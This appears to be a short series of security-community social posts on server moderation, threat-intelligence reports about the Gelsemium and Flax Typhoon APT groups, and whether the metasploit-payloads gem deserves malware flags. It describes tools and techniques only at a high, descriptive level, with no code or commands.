I have had several people that received the ban hammer recently grousing about how it goes against my air of “kindness” and the quote I have in my profile. I firmly believe in the importance of being kind to other people. But there are limits.
@jerry these actions are certainly kind to everyone else on the server, ban early, ban often (the old #metasploit IRC channel motto due to it being a troll magnet)
The Palo Alto Networks Unit 42 research team discovered some activity that they attributed to a very stealthy and rarely seen APT, #Gelsemium. They target a diverse group of industries but use tools like #CobaltStrike, #MetaSploit, and #ChinaChopper but also used the Potato Suite that was seen as JuicyPotato.exe (who can't appreciate that?!). This was a great weekend read and I hope you all enjoy it as much as I did! Happy Hunting!
Good day everyone! The Microsoft Threat Intelligence team has discovered activity from a group known as #FlaxTyphoon. They are a nation-state group from China that targeted organizations in Taiwan. While the group leverages tools that are commonly used, like #ChinaChopper, #MetaSploit, and #Mimikatz, they also rely on abusing #LOLBINS, or Living-off-the-land binaries and scripts (tools that exist and come with the native operating system). Some of their TTPs include using registry key modification for persistence, using #powershell, #certutil, or #bitsadmin to download tools, and accessing #LSASS process memory and Security Account Manager registry hive for credential access. This is a great article that not only provides high-level details but it provides a starting point for any organization to start threat hunting by using the technical details provided! Enjoy your weekend and #HappyHunting!
Granted the metasploit-payloads gem has far more exotic payloads which might trigger code scanners, but payloads are useless without an exploit. Absolutely no reason why payloads should be flagged as malicious. #metasploit#rubygems